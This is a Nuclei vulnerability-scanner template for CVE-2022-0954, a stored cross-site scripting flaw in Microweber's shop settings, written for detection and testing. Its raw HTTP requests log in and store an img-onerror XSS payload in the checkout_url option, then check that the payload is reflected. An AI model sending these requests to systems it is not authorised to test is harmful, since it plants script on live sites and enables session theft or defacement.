nuclei-templates/http/cves/2022/CVE-2022-0954.yaml

64 lines
2.7 KiB
YAML

id: CVE-2022-0954
info:
name: Microweber <1.2.11 - Stored Cross-Site Scripting
author: amit-jd
severity: medium
description: |
Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability.
reference:
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0954
cwe-id: CWE-79
epss-score: 0.00144
epss-percentile: 0.50048
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: microweber
product: microweber
tags: cve,cve2022,xss,microweber,huntr
http:
- raw:
- |
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /api/save_option HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/admin/view:shop/action:options
option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
- |
POST /module/ HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/admin/view:shop/action:options
module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
matchers:
- type: dsl
dsl:
- 'contains(body_2,"true")'
- contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
- 'contains(header_3,"text/html")'
- 'status_code_3==200'
condition: and
# digest: 4b0a00483046022100f47325bc42307a32f6e2e4472aed48c92bbf1db2f9ec0f10f846f2f2a6007d2a022100bf6b71c098e00a511182bad5b21462afc1419e5fe4f57c4d45ae878d1f50da82:922c64590222798bb761d5b6d8e72950